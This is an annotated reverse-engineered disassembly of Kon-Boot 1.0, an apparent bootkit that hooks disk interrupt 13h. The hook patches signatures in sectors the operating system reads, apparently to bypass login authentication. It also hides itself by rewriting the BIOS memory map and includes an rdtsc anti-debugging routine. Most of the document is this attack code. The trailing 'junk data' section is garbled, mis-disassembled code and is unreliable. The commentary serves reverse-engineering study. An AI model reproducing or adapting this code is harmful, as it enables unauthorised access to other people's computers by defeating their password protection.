
; Kon-B00t Main Code

; executed at end of memory at 9XXXh:0000h

00000000  EB04              jmp short Main_Code

; values will be patched by the boot sector
00000002  Original_Int13h_Offset:   dw  0000h                                   ; Interrupt 13h original offset
00000004  Original_Int13h_Segment:  dw  0000h                                   ; Interrupt 13h original segment

Main_Code:
00000006  E80105            call word Clear_Textmode_Screen

; initial screen
00000009  66B90A000000      mov ecx,10                                          ; waiting cycle
0000000F  BEE605            mov si,Textmode_Data_1
00000012  E81705            call word Print_String

; checking the SMAP entries
00000015  66B928000000      mov ecx,0x28                                        ; waiting cycle     ; CODE IS CURRENTLY REVERSE ENGINEERED BY PK
0000001B  BE9409            mov si,Textmode_Data_2                              ; PLEASE LOOK FOR UPDATES ON THE WEBSITE WHERE YOU GOT THIS FILE
0000001E  E80B05            call word Print_String                              ; ==============================================================
00000021  E85F01            call word SMAP_Check_Entries                        ; check the SMAP entries

; booting the OS
00000024  66B928000000      mov ecx,0x28                                        ; waiting cycle
0000002A  BE110A            mov si,Textmode_Data_5
0000002D  E8FC04            call word Print_String

; reset the cursor
00000030  E8F004            call word Set_Textmode_Cursor_Shape

; read the bootloader from the hard disk
00000033  33C9              xor cx,cx                                           ; first cylinder
00000035  06                push es
00000036  8EC1              mov es,cx                                           ; target buffer segment = 0000h
00000038  BB007C            mov bx,0x7c00                                       ; target buffer offset  = 7C00h (boot loader)
0000003B  B80102            mov ax,0x201                                        ; 02h Read Sectors, 1 sector
0000003E  41                inc cx
0000003F  BA8000            mov dx,0x80                                         ; first hard disk
00000042  CD13              int 0x13
00000044  07                pop es
00000045  7206              jc Error_Loading_Bootloader                         ; display a message if unable to load

; execute the bootloader
00000047  6A00              push byte 0000h   ; segment
00000049  68007C            push word 7C00h   ; offset
0000004C  CB                retf              ; execute the bootloader!         writer could have use jmp word 0000h:7C000h

Error_Loading_Bootloader:
; putting out an error message
0000004D  66B90A000000      mov ecx,10                                          ; waiting cycle
00000053  BE2D0A            mov si,Textmode_Data_6                              ; displaying " Fatal - reading orginal MBR failed!"
00000056  E8D304            call word Print_String
00000059  EBFE              jmp short 0x59                                      ; endless loop, author could have used cli, hlt



; Interrupt 13h Service Handler, background service

Interrupt_13h_Service_Handler:

0000005B  9C                pushfw                                              ; preserve flags
0000005C  0AD2              or dl,dl                                            ; hard disk? (if not signed = floppy)
0000005E  790B              jns Exit_Interrupt_13h
00000060  FA                cli                                                 ; prevent other interrupts to happen
00000061  80FC02            cmp ah,0x2                                          ; Read Sectors?
00000064  740B              jz Handle_Interrupt_13h
00000066  80FC42            cmp ah,0x42
00000069  7406              jz Handle_Interrupt_13h                             ; Extended Read Sectors?

Exit_Interrupt_13h:
0000006B  9D                popfw
0000006C  2EFF2E0200        jmp word far [cs:0x2]                               ; jump to original interrupt 13h handler

Handle_Interrupt_13h:
00000071  2E88268600        mov [cs:0x86],ah
00000076  2EFF1E0200        call word far [cs:0x2]                              ; call original interrupt 13h handler
0000007B  0F820101          jc word Return_Interrupt_13h                        ; and exit on error
0000007F  06                push es                                             ; preserve the register contents (must be later passed to user)
00000080  1E                push ds
00000081  9C                pushfw
00000082  60                pushaw
00000083  8BFB              mov di,bx                                           ; target read buffer
00000085  B400              mov ah,0x0    ; will be set by line 71
00000087  80FC02            cmp ah,0x2                                          ; Read?
0000008A  7406              jz Parameters_Normalized
0000008C  8A4402            mov al,[si+0x2]                                     ; get sector count from disk address packet [Extended Read]
0000008F  C47C04            les di,[si+0x4]                                     ; get buffer from disk address packet       [Extended Read]
Parameters_Normalized:
00000092  84C0              test al,al                                          ; no sectors to read?
00000094  0F84E100          jz word Return_Interrupt_13h_CleanUp                ; then exit

00000098  6633DB            xor ebx,ebx                                         ; edx will hold buffer size
0000009B  8AD8              mov bl,al
0000009D  C1E309            shl bx,9                                            ; sector count * 512
000000A0  FC                cld
000000A1  6633F6            xor esi,esi                                         ; source starts from zero
000000A4  0E                push cs                                             ; get current segment
000000A5  5E                pop si                                              ; is in top of real mode memory
000000A6  66C1E604          shl esi,0x4                                         ; -> linear address of code segment
000000AA  03F7              add si,di                                           ; + buffer address
000000AC  0F80C900          jo word Return_Interrupt_13h_CleanUp                ; overflow?
000000B0  0E                push cs
000000B1  1F                pop ds                                              ; access data within this code

; bla
Check_Source_Buffer:
000000B2  85DB              test bx,bx                                          ; validate the buffer address
000000B4  0F84C100          jz word Return_Interrupt_13h_CleanUp
000000B8  47                inc di
000000B9  4B                dec bx
000000BA  33C9              xor cx,cx
000000BC  49                dec cx
000000BD  66BEC6040000      mov esi,0x4c6

Why_Not_SpaghettiCode_1:
000000C3  41                inc cx
000000C4  66AD              lodsd
000000C6  6685C0            test eax,eax                                        ; zero?
000000C9  74E7              jz Check_Source_Buffer
000000CB  83FB08            cmp bx,byte +0x8
000000CE  0F86A700          jna word Return_Interrupt_13h_CleanUp

; now set the target to scan (es:di)
000000D2  6650              push eax
000000D4  6653              push ebx
000000D6  6633C0            xor eax,eax
000000D9  8CC0              mov ax,es
000000DB  8BDF              mov bx,di         ; some various calculations here :)
000000DD  C1EB04            shr bx,0x4        ; could be done easier ;)
000000E0  03C3              add ax,bx         ; but anyway
000000E2  8EC0              mov es,ax
000000E4  83E70F            and di,byte +0xf
000000E7  665B              pop ebx
000000E9  6658              pop eax
000000EB  66263905          cmp [es:di],eax
000000EF  7510              jnz 0x101

000000F1  66AD              lodsd
000000F3  6685C0            test eax,eax
000000F6  740F              jz 0x107
000000F8  6626394504        cmp [es:di+0x4],eax
000000FD  75C4              jnz Why_Not_SpaghettiCode_1
000000FF  EB06              jmp short 0x107

00000101  6683C604          add esi,byte +0x4
00000105  EBBC              jmp short Why_Not_SpaghettiCode_1

00000107  6633C0            xor eax,eax
0000010A  8CC8              mov ax,cs
0000010C  66C1E004          shl eax,0x4
00000110  055A0A            add ax,0xa5a
00000113  84C9              test cl,cl
00000115  740A              jz 0x121
00000117  6651              push ecx

00000119  6683C028          add eax,byte +0x28
0000011D  E2FA              loop 0x119
0000011F  6659              pop ecx
00000121  6683F907          cmp ecx,byte +0x7
00000125  7507              jnz 0x12e
00000127  26C6450600        mov byte [es:di+0x6],0x0
0000012C  EB48              jmp short Check_Source_Buffer_End                   ; (junk, spaghetti call)
0000012E  6683F906          cmp ecx,byte +0x6
00000132  750F              jnz 0x143

; store 15 nops
00000134  51                push cx
00000135  57                push di
00000136  50                push ax
00000137  B90F00            mov cx,15
0000013A  B090              mov al,0x90                                         ; 90h = nop opcode
0000013C  F3AA              rep stosb
0000013E  58                pop ax
0000013F  5F                pop di
00000140  59                pop cx
00000141  EB33              jmp short Check_Source_Buffer_End                   ; (junk, spaghetti call)

00000143  6683F904          cmp ecx,byte +0x4
00000147  751F              jnz 0x168
00000149  6626C705666A2000  mov dword [es:di],0x206a66
00000151  26C6450366        mov byte [es:di+0x3],0x66
00000156  26C6450468        mov byte [es:di+0x4],0x68
0000015B  6626894505        mov [es:di+0x5],eax
00000160  26C7450966CB      mov word [es:di+0x9],0xcb66
00000166  EB0E              jmp short Check_Source_Buffer_End                   ; (junk, spaghetti call)

00000168  26C64505C3        mov byte [es:di+0x5],0xc3
0000016D  26C60568          mov byte [es:di],0x68
00000171  6626894501        mov [es:di+0x1],eax

Check_Source_Buffer_End:
00000176  E939FF            jmp word Check_Source_Buffer

Return_Interrupt_13h_CleanUp:                                                   ; return and clean up
00000179  61                popaw                                               ; restore the registers
0000017A  9D                popfw
0000017B  1F                pop ds
0000017C  07                pop es
0000017D  CA0200            retf 0x2

Return_Interrupt_13h:                                                           ; (junk)
00000180  CA0200            retf 0x2


SMAP_Check_Entries:
00000183  06                push es
00000184  0E                push cs
00000185  07                pop es
00000186  33ED              xor bp,bp
00000188  6633DB            xor ebx,ebx
0000018B  BF0E03            mov di,0x30e
0000018E  4D                dec bp
0000018F  45                inc bp
00000190  83FD14            cmp bp,byte +0x14
00000193  7320              jnc 0x1b5
00000195  66BA50414D53      mov edx,0x534d4150
0000019B  66B914000000      mov ecx,0x14
000001A1  66B820E80000      mov eax,0xe820
000001A7  CD15              int 0x15
000001A9  720A              jc 0x1b5
000001AB  6685DB            test ebx,ebx
000001AE  7405              jz 0x1b5
000001B0  83C714            add di,byte +0x14
000001B3  EBDA              jmp short 0x18f
000001B5  2E892E0C03        mov [cs:0x30c],bp
000001BA  1E                push ds
000001BB  6A00              push byte +0x0
000001BD  1F                pop ds
000001BE  6633C0            xor eax,eax
000001C1  A11304            mov ax,[0x413]
000001C4  66C1E00A          shl eax,0xa
000001C8  1F                pop ds
000001C9  BF0E03            mov di,0x30e
000001CC  66268B15          mov edx,[es:di]
000001D0  6626335504        xor edx,[es:di+0x4]
000001D5  7511              jnz 0x1e8
000001D7  66268B5508        mov edx,[es:di+0x8]
000001DC  662633550C        xor edx,[es:di+0xc]
000001E1  663BD0            cmp edx,eax
000001E4  0F84BC00          jz word 0x2a4
000001E8  6656              push esi
000001EA  6651              push ecx
000001EC  66B928000000      mov ecx,0x28
000001F2  BEBB09            mov si,Textmode_Data_3
000001F5  E83403            call word Print_String
000001F8  6659              pop ecx
000001FA  665E              pop esi
000001FC  81ECB801          sub sp,0x1b8
00000200  33DB              xor bx,bx
00000202  8BCD              mov cx,bp
00000204  8BEC              mov bp,sp
00000206  06                push es
00000207  57                push di
00000208  51                push cx
00000209  50                push ax
0000020A  16                push ss
0000020B  07                pop es
0000020C  8BFD              mov di,bp
0000020E  B9DC00            mov cx,0xdc
00000211  33C0              xor ax,ax
00000213  F3AB              rep stosw
00000215  58                pop ax
00000216  59                pop cx
00000217  5F                pop di
00000218  07                pop es
00000219  55                push bp
0000021A  6660              pushad
0000021C  1E                push ds
0000021D  06                push es
0000021E  06                push es
0000021F  1F                pop ds
00000220  16                push ss
00000221  07                pop es
00000222  B90A00            mov cx,0xa
00000225  8BF7              mov si,di
00000227  8BFD              mov di,bp
00000229  F3A5              rep movsw
0000022B  07                pop es
0000022C  1F                pop ds
0000022D  6661              popad
0000022F  6626837D0400      cmp dword [es:di+0x4],byte +0x0
00000235  753A              jnz 0x271
00000237  6626837D0C00      cmp dword [es:di+0xc],byte +0x0
0000023D  7532              jnz 0x271
0000023F  66268B15          mov edx,[es:di]
00000243  663BD0            cmp edx,eax
00000246  7D29              jnl 0x271
00000248  6626035508        add edx,[es:di+0x8]
0000024D  663BD0            cmp edx,eax
00000250  7E1F              jng 0x271
00000252  662BD0            sub edx,eax
00000255  66295608          sub [bp+0x8],edx
00000259  83C514            add bp,byte +0x14
0000025C  26FF060C03        inc word [es:0x30c]
00000261  66894600          mov [bp+0x0],eax
00000265  66895608          mov [bp+0x8],edx
00000269  66C7461002000000  mov dword [bp+0x10],0x2
00000271  83C714            add di,byte +0x14
00000274  83C514            add bp,byte +0x14
00000277  43                inc bx
00000278  3BD9              cmp bx,cx
0000027A  759E              jnz 0x21a
0000027C  5D                pop bp
0000027D  1E                push ds
0000027E  BF0E03            mov di,0x30e
00000281  8BF5              mov si,bp
00000283  16                push ss
00000284  1F                pop ds
00000285  B9DC00            mov cx,0xdc
00000288  F3A5              rep movsw
0000028A  1F                pop ds
0000028B  66A15400          mov eax,[0x54]
0000028F  6626A30803        mov [es:0x308],eax
00000294  B8BA02            mov ax,0x2ba
00000297  8C065600          mov [0x56],es
0000029B  A35400            mov [0x54],ax
0000029E  81C4B801          add sp,0x1b8
000002A2  EB14              jmp short 0x2b8
000002A4  6656              push esi
000002A6  6651              push ecx
000002A8  66B928000000      mov ecx,0x28
000002AE  BEF409            mov si,Textmode_Data_4
000002B1  E87802            call word Print_String
000002B4  6659              pop ecx
000002B6  665E              pop esi
000002B8  07                pop es
000002B9  C3                ret   ; end of SMAP entry check function


000002BA  669C              pushfd
000002BC  3D20E8            cmp ax,0xe820
000002BF  7544              jnz 0x305
000002C1  1E                push ds
000002C2  6660              pushad
000002C4  0E                push cs
000002C5  1F                pop ds
000002C6  6633ED            xor ebp,ebp
000002C9  BE0E03            mov si,0x30e
000002CC  8B2E0C03          mov bp,[0x30c]
000002D0  663BDD            cmp ebx,ebp
000002D3  7F27              jg 0x2fc
000002D5  663BDD            cmp ebx,ebp
000002D8  7509              jnz 0x2e3
000002DA  6661              popad
000002DC  6633DB            xor ebx,ebx
000002DF  664B              dec ebx
000002E1  EB0D              jmp short 0x2f0
000002E3  6BCB14            imul cx,bx,byte +0x14
000002E6  03F1              add si,cx
000002E8  B90A00            mov cx,0xa
000002EB  FC                cld
000002EC  F3A5              rep movsw
000002EE  6661              popad
000002F0  1F                pop ds
000002F1  669D              popfd
000002F3  6643              inc ebx
000002F5  668BC2            mov eax,edx
000002F8  F8                clc
000002F9  CA0200            retf 0x2
000002FC  6661              popad
000002FE  1F                pop ds
000002FF  669D              popfd
00000301  F9                stc
00000302  CA0200            retf 0x2
00000305  669D              popfd
00000307  EA00000000        jmp word 0x0:0x0


; fill some zeroes
times 000004C6-($-$$) db 00h



000004C6  31DB              xor bx,bx
000004C8  FFE5              jmp bp
000004CA  0000              add [bx+si],al
000004CC  0000              add [bx+si],al
000004CE  EA00001000        jmp word 0x10:0x0
000004D3  1000              adc [bx+si],al
000004D5  90                nop
000004D6  EA00100000        jmp word 0x0:0x1000
000004DB  1000              adc [bx+si],al
000004DD  89FF              mov di,di
000004DF  95                xchg ax,bp
000004E0  F0                db 0xF0
000004E1  F2                db 0xF2
000004E2  FF                db 0xFF
000004E3  FF6A04            jmp word far [bp+si+0x4]
000004E6  666A20            push dword 0x20
000004E9  660000            o32 add [bx+si],al
000004EC  0000              add [bx+si],al
000004EE  FF750C            push word [di+0xc]
000004F1  FF5508            call word near [di+0x8]
000004F4  5D                pop bp
000004F5  C268BB            ret 0xbb68
000004F8  19E8              sbb ax,bp
000004FA  0000              add [bx+si],al
000004FC  0000              add [bx+si],al
000004FE  C785B0FAFFFF      mov word [di-0x550],0xffff
00000504  0400              add al,0x0
00000506  0000              add [bx+si],al
00000508  0000              add [bx+si],al


Clear_Textmode_Screen:

; clears the textmode screen and sets the cursor to a pre-defined position

0000050A  06                push es
0000050B  6800B8            push word 0xb800                                    ; segment B800h = Textmode Buffer
0000050E  07                pop es
0000050F  33C0              xor ax,ax                                           ; 2 bytes per character (color attribute and character)
00000511  33FF              xor di,di
00000513  B9A00F            mov cx,80 * 50                                      ; 80 (height) * 50 (width)
00000516  F3AB              rep stosw                                           ; clear the text buffer!

; set the cursor to colum 0, row 26
00000518  B402              mov ah,0x2                                          ; 02h Set Cursor Position
0000051A  B700              mov bh,0x0                                          ; page 0
0000051C  BA001A            mov dx,0x1a00                                       ; colum 0, row 26
0000051F  CD10              int 0x10

00000521  07                pop es
00000522  C3                ret


Set_Textmode_Cursor_Shape:
00000523  B401              mov ah,0x1                                          ; 01h Set Textmode Cursor Shape
00000525  B500              mov ch,0x0                                          ; cursor blink = 00 (normal), topmost scan line containing cursor = 0
00000527  B108              mov cl,0x8                                          ; bottom scan line containing cursor (bits 0-4), 00001000b, line 3
00000529  CD10              int 0x10
0000052B  C3                ret


Print_String:
; prints out a string and checks for a debugger or emulator present when 10h appears as character
; refresh cycle multiplicator in ecx
0000052C  1E                push ds
0000052D  06                push es
0000052E  60                pushaw
0000052F  0E                push cs                                             ; set ds to the code segment (for accessing the data)
00000530  1F                pop ds
00000531  6800B8            push word 0xb800                                    ; set es to textmode buffer (segment B800h)
00000534  07                pop es
00000535  33D2              xor dx,dx
00000537  33C0              xor ax,ax
00000539  33FF              xor di,di                                           ; starts on character 0 in the source string
0000053B  33ED              xor bp,bp                                           ; -> target buffer
0000053D  AC                lodsb                                               ; always ski the first character, why not ;)
0000053E  BFA000            mov di,0xa0
00000541  F7E7              mul di
00000543  8BF8              mov di,ax                                           ; first character = low 8 bit index
Print_String_Loop:
00000545  AC                lodsb                                               ; get next character
00000546  84C0              test al,al                                          ; last one (zero terminated)?
00000548  7447              jz Print_String_Exit
0000054A  3C0A              cmp al,10                                           ; LF (line feed)?
0000054C  750D              jnz Character_Not_LF
0000054E  26C6430100        mov byte [es:bp+di+0x1],0x0                         ; setting character attribute to zero
00000553  81C7A000          add di,10                                           ; +5 characters
00000557  33ED              xor bp,bp                                           ; starting at the beginning of the line
00000559  EBEA              jmp short Print_String_Loop
Character_Not_LF:
0000055B  3C0D              cmp al,13                                           ; do nothing on CR (carriage return)
0000055D  74E6              jz Print_String_Loop
0000055F  3C10              cmp al,0x10                                         ; > 16 (control character)?
00000561  770B              ja Character_Not_ControlChar
00000563  8AE0              mov ah,al
00000565  3C10              cmp al,0x10                                         ; DLE?
00000567  75DC              jnz Print_String_Loop
00000569  E82900            call word Anti_Reverse_Engineering                  ; if yes then check for emulation or debugging
0000056C  EBD7              jmp short Print_String_Loop
Character_Not_ControlChar:
0000056E  268803            mov [es:bp+di],al                                   ; store character to textmode buffer
00000571  26886301          mov [es:bp+di+0x1],ah                               ; store attribute to textmode buffer
00000575  83C502            add bp,byte +0x2
00000578  26C603DB          mov byte [es:bp+di],0xdb
0000057C  26886301          mov [es:bp+di+0x1],ah
00000580  26804B0180        or byte [es:bp+di+0x1],0x80
00000585  6650              push eax
00000587  668BC1            mov eax,ecx                                         ; passes the refresh cycle from ecx to eax
0000058A  E82D00            call word Wait_Refresh_Cycle
0000058D  6658              pop eax
0000058F  EBB4              jmp short Print_String_Loop

Print_String_Exit:
00000591  61                popaw
00000592  07                pop es
00000593  1F                pop ds
00000594  C3                ret


Anti_Reverse_Engineering:                                                       ; nice but I did only statical analysis! no use of debuggers/emulators :)
00000595  6650              push eax
00000597  6651              push ecx
00000599  0F31              rdtsc             =)
0000059B  6633D0            xor edx,eax
0000059E  6633D2            xor edx,edx
000005A1  B91000            mov cx,0x10
000005A4  F7F1              div cx
000005A6  83FA02            cmp dx,byte +0x2
000005A9  7503              jnz 0x5ae
000005AB  BA0B00            mov dx,0xb
000005AE  83FA09            cmp dx,byte +0x9
000005B1  7CE6              jl 0x599
000005B3  6659              pop ecx
000005B5  6658              pop eax
000005B7  8AE2              mov ah,dl
000005B9  C3                ret


Wait_Refresh_Cycle:
; waits for refresh cycles, must be eax * 19E5h / 64h times
000005BA  60                pushaw
000005BB  66BBE5190000      mov ebx,0x19e5
000005C1  66B964000000      mov ecx,0x64
000005C7  66F7E3            mul ebx                                             ; * 19E5h
000005CA  66F7F1            div ecx                                             ; / 64h
000005CD  668BC8            mov ecx,eax
000005D0  E461              in al,0x61                                          ; System Control Port
000005D2  2410              and al,00010000b                                    ; mask out bit 4 (toggles with each refresh request)
000005D4  8AE0              mov ah,al
Wait_Refresh_Cycle_Loop:
000005D6  E461              in al,0x61                                          ; System Control Port
000005D8  2410              and al,00010000b                                    ; mask out bit 4 (toggles with each refresh request)
000005DA  3AC4              cmp al,ah                                           ; always a full refresh cycle (1 to 0 and 0 to 1)
000005DC  74F8              jz Wait_Refresh_Cycle_Loop
000005DE  8AE0              mov ah,al
000005E0  6649              dec ecx                                             ; in a loop
000005E2  75F2              jnz Wait_Refresh_Cycle_Loop
000005E4  61                popaw
000005E5  C3                ret


                            ;  anti reverse engineering will be called here
                            ;  v
Textmode_Data_1     db      0, 10h, 13, 10, 13, 10, "                                                         ", 13, 10, "                            ۱                      ", 13, 10, "                                ۱  ", 13, 10, "        ۱   ۱                  ", 13, 10, "         ۱ ۱۱  ۱ ۱   ", 13, 10, "           ۱        ", 13, 10, "         ۱     ۱      ۱", 13, 10, "         ۱           ۱ ۱   ", 13, 10, "           ۱                      ", 13, 10, "                                             ", 13, 10, "                                                            ", 10, 10, "                              ", 0Fh, "by Piotr Bania", 10, "                           www.kryptoslogic.com ", 10, 10, 10, 10, "  ", 0AFh, 0Eh, " Kon-Boot ver. 1.0 - ready! ", 0Fh, "h4x0Rin uH?", 10, "  ", 0AFh, 0Ch, " This software is freeware for not commercial usage! .", 0
;              ^
; removes h4x0Rin message by CR

Textmode_Data_2     db      15h, 0Fh, "  ", 0AFh, 0Eh, " Checking SMAP BIOS entries ...", 10, 0

Textmode_Data_3     db      16h, 0Fh, "  ", 0AFh, 0Ch, " Dummy BIOS detected, trying to fix SMAP entries.", 10, 0

Textmode_Data_4     db      16h, 0Fh, "  ", 0AFh, 0Eh, " BIOS seems to be OK.", 10, 0

Textmode_Data_5     db      17h, 0Fh, "  ", 0AFh, 0Eh, " Booting up!", 0Fh, "  - EOT ", 10, 0

Textmode_Data_6     db      18h, 0Fh, "  ", 0AFh, 0Ch, " Fatal - reading orginal MBR failed!", 10, 0


; JUNK DATA :
00000A59  90                nop
00000A5A  6A00              push byte +0x0
00000A5C  E94D02            jmp word 0xcac
00000A5F  0000              add [bx+si],al
00000A61  90                nop
00000A62  90                nop
00000A63  90                nop
00000A64  90                nop
00000A65  90                nop
00000A66  90                nop
00000A67  90                nop
00000A68  90                nop
00000A69  90                nop
00000A6A  90                nop
00000A6B  90                nop
00000A6C  90                nop
00000A6D  90                nop
00000A6E  33DB              xor bx,bx
00000A70  FFE5              jmp bp
00000A72  EBFE              jmp short 0xa72
00000A74  90                nop
00000A75  90                nop
00000A76  90                nop
00000A77  90                nop
00000A78  90                nop
00000A79  90                nop
00000A7A  90                nop
00000A7B  90                nop
00000A7C  90                nop
00000A7D  90                nop
00000A7E  90                nop
00000A7F  90                nop
00000A80  90                nop
00000A81  90                nop
00000A82  6A01              push byte +0x1
00000A84  E92502            jmp word 0xcac
00000A87  0000              add [bx+si],al
00000A89  90                nop
00000A8A  90                nop
00000A8B  90                nop
00000A8C  90                nop
00000A8D  90                nop
00000A8E  90                nop
00000A8F  90                nop
00000A90  90                nop
00000A91  90                nop
00000A92  90                nop
00000A93  90                nop
00000A94  90                nop
00000A95  90                nop
00000A96  EA00001000        jmp word 0x10:0x0
00000A9B  1000              adc [bx+si],al
00000A9D  EBFE              jmp short 0xa9d
00000A9F  90                nop
00000AA0  90                nop
00000AA1  90                nop
00000AA2  90                nop
00000AA3  90                nop
00000AA4  90                nop
00000AA5  90                nop
00000AA6  90                nop
00000AA7  90                nop
00000AA8  90                nop
00000AA9  90                nop
00000AAA  6A02              push byte +0x2
00000AAC  E9FD01            jmp word 0xcac
00000AAF  0000              add [bx+si],al
00000AB1  90                nop
00000AB2  90                nop
00000AB3  90                nop
00000AB4  90                nop
00000AB5  90                nop
00000AB6  90                nop
00000AB7  90                nop
00000AB8  90                nop
00000AB9  90                nop
00000ABA  90                nop
00000ABB  90                nop
00000ABC  90                nop
00000ABD  90                nop
00000ABE  EA00100000        jmp word 0x0:0x1000
00000AC3  1000              adc [bx+si],al
00000AC5  EBFE              jmp short 0xac5
00000AC7  90                nop
00000AC8  90                nop
00000AC9  90                nop
00000ACA  90                nop
00000ACB  90                nop
00000ACC  90                nop
00000ACD  90                nop
00000ACE  90                nop
00000ACF  90                nop
00000AD0  90                nop
00000AD1  90                nop
00000AD2  E93401            jmp word 0xc09
00000AD5  0000              add [bx+si],al
00000AD7  90                nop
00000AD8  90                nop
00000AD9  90                nop
00000ADA  90                nop
00000ADB  90                nop
00000ADC  90                nop
00000ADD  90                nop
00000ADE  90                nop
00000ADF  90                nop
00000AE0  90                nop
00000AE1  90                nop
00000AE2  90                nop
00000AE3  90                nop
00000AE4  90                nop
00000AE5  90                nop
00000AE6  FF95F0F2          call word near [di-0xd10]
00000AEA  FF                db 0xFF
00000AEB  FF                db 0xFF
00000AEC  EBFE              jmp short 0xaec
00000AEE  90                nop
00000AEF  90                nop
00000AF0  90                nop
00000AF1  90                nop
00000AF2  90                nop
00000AF3  90                nop
00000AF4  90                nop
00000AF5  90                nop
00000AF6  90                nop
00000AF7  90                nop
00000AF8  90                nop
00000AF9  90                nop
00000AFA  EB64              jmp short 0xb60
00000AFC  90                nop
00000AFD  90                nop
00000AFE  90                nop
00000AFF  90                nop
00000B00  90                nop
00000B01  90                nop
00000B02  90                nop
00000B03  90                nop
00000B04  90                nop
00000B05  90                nop
00000B06  90                nop
00000B07  90                nop
00000B08  90                nop
00000B09  90                nop
00000B0A  90                nop
00000B0B  90                nop
00000B0C  90                nop
00000B0D  90                nop
00000B0E  FFE3              jmp bx
00000B10  EBFE              jmp short 0xb10
00000B12  90                nop
00000B13  90                nop
00000B14  90                nop
00000B15  90                nop
00000B16  90                nop
00000B17  90                nop
00000B18  90                nop
00000B19  90                nop
00000B1A  90                nop
00000B1B  90                nop
00000B1C  90                nop
00000B1D  90                nop
00000B1E  90                nop
00000B1F  90                nop
00000B20  90                nop
00000B21  90                nop
00000B22  EB2E              jmp short 0xb52
00000B24  90                nop
00000B25  90                nop
00000B26  90                nop
00000B27  90                nop
00000B28  90                nop
00000B29  90                nop
00000B2A  90                nop
00000B2B  90                nop
00000B2C  90                nop
00000B2D  90                nop
00000B2E  90                nop
00000B2F  90                nop
00000B30  90                nop
00000B31  90                nop
00000B32  90                nop
00000B33  90                nop
00000B34  90                nop
00000B35  90                nop
00000B36  FF750C            push word [di+0xc]
00000B39  FF5508            call word near [di+0x8]
00000B3C  5D                pop bp
00000B3D  C20800            ret 0x8
00000B40  EBFE              jmp short 0xb40
00000B42  90                nop
00000B43  90                nop
00000B44  90                nop
00000B45  90                nop
00000B46  90                nop
00000B47  90                nop
00000B48  90                nop
00000B49  90                nop
00000B4A  0000              add [bx+si],al
00000B4C  0000              add [bx+si],al
00000B4E  0000              add [bx+si],al
00000B50  0000              add [bx+si],al
00000B52  9C                pushfw
00000B53  60                pushaw
00000B54  8B7508            mov si,[di+0x8]
00000B57  E8C300            call word 0xc1d
00000B5A  0000              add [bx+si],al
00000B5C  61                popaw
00000B5D  9D                popfw
00000B5E  EBD6              jmp short 0xb36
00000B60  9C                pushfw
00000B61  60                pushaw
00000B62  E80000            call word 0xb65
00000B65  0000              add [bx+si],al
00000B67  5D                pop bp
00000B68  B957FD            mov cx,0xfd57
00000B6B  05008B            add ax,0x8b00
00000B6E  C3                ret
00000B6F  8138FFD0          cmp word [bx+si],0xd0ff
00000B73  5B                pop bx
00000B74  8B7405            mov si,[si+0x5]
00000B77  40                inc ax
00000B78  E2F5              loop 0xb6f
00000B7A  EB1C              jmp short 0xb98
00000B7C  FC                cld
00000B7D  8DBD9F00          lea di,[di+0x9f]
00000B81  0000              add [bx+si],al
00000B83  8BF0              mov si,ax
00000B85  6A05              push byte +0x5
00000B87  59                pop cx
00000B88  F3A4              rep movsb
00000B8A  8D7D4B            lea di,[di+0x4b]
00000B8D  C600E8            mov byte [bx+si],0xe8
00000B90  2BF8              sub di,ax
00000B92  83EF05            sub di,byte +0x5
00000B95  897801            mov [bx+si+0x1],di
00000B98  61                popaw
00000B99  9D                popfw
00000B9A  E96FFF            jmp word 0xb0c
00000B9D  FF                db 0xFF
00000B9E  FF51B9            call word near [bx+di-0x47]
00000BA1  0010              add [bx+si],dl
00000BA3  0000              add [bx+si],al
00000BA5  813E4D5A9000      cmp word [0x5a4d],0x90
00000BAB  7403              jz 0xbb0
00000BAD  4E                dec si
00000BAE  E2F5              loop 0xba5
00000BB0  59                pop cx
00000BB1  C3                ret
00000BB2  9C                pushfw
00000BB3  60                pushaw
00000BB4  E80000            call word 0xbb7
00000BB7  0000              add [bx+si],al
00000BB9  5D                pop bp
00000BBA  FC                cld
00000BBB  8B7C24            mov di,[si+0x24]
00000BBE  2483              and al,0x83
00000BC0  EF                out dx,ax
00000BC1  058D75            add ax,0x758d
00000BC4  4D                dec bp
00000BC5  6A05              push byte +0x5
00000BC7  59                pop cx
00000BC8  F3A4              rep movsb
00000BCA  B96820            mov cx,0x2068
00000BCD  1000              adc [bx+si],al
00000BCF  813833D2          cmp word [bx+si],0xd233
00000BD3  51                push cx
00000BD4  52                push dx
00000BD5  7405              jz 0xbdc
00000BD7  40                inc ax
00000BD8  E2F5              loop 0xbcf
00000BDA  EB0E              jmp short 0xbea
00000BDC  8D7D38            lea di,[di+0x38]
00000BDF  C600E8            mov byte [bx+si],0xe8
00000BE2  2BF8              sub di,ax
00000BE4  83EF05            sub di,byte +0x5
00000BE7  897801            mov [bx+si+0x1],di
00000BEA  61                popaw
00000BEB  9D                popfw
00000BEC  832C24            sub word [si],byte +0x24
00000BEF  05C39C            add ax,0x9cc3
00000BF2  60                pushaw
00000BF3  90                nop
00000BF4  90                nop
00000BF5  8BF0              mov si,ax
00000BF7  E82300            call word 0xc1d
00000BFA  0000              add [bx+si],al
00000BFC  61                popaw
00000BFD  9D                popfw
00000BFE  33D2              xor dx,dx
00000C00  51                push cx
00000C01  52                push dx
00000C02  6A08              push byte +0x8
00000C04  50                push ax
00000C05  CB                retf
00000C06  0000              add [bx+si],al
00000C08  0000              add [bx+si],al
00000C0A  009C608B          add [si-0x74a0],bl
00000C0E  B5F0              mov ch,0xf0
00000C10  F2                db 0xF2
00000C11  FF                db 0xFF
00000C12  FF                db 0xFF
00000C13  E80700            call word 0xc1d
00000C16  0000              add [bx+si],al
00000C18  61                popaw
00000C19  9D                popfw
00000C1A  E9C7FE            jmp word 0xae4
00000C1D  FF                db 0xFF
00000C1E  FF                db 0xFF
00000C1F  B904D7            mov cx,0xd704
00000C22  7400              jz 0xc24
00000C24  813E4D5A9000      cmp word [0x5a4d],0x90
00000C2A  7405              jz 0xc31
00000C2C  4E                dec si
00000C2D  E2F5              loop 0xc24
00000C2F  EB7C              jmp short 0xcad
00000C31  8B5E3C            mov bx,[bp+0x3c]
00000C34  03DE              add bx,si
00000C36  E80601            call word 0xd3f
00000C39  0000              add [bx+si],al
00000C3B  8BBBA000          mov di,[bp+di+0xa0]
00000C3F  0000              add [bx+si],al
00000C41  03FE              add di,si
00000C43  8B93A400          mov dx,[bp+di+0xa4]
00000C47  0000              add [bx+si],al
00000C49  85D2              test dx,dx
00000C4B  7460              jz 0xcad
00000C4D  FC                cld
00000C4E  E80000            call word 0xc51
00000C51  0000              add [bx+si],al
00000C53  5D                pop bp
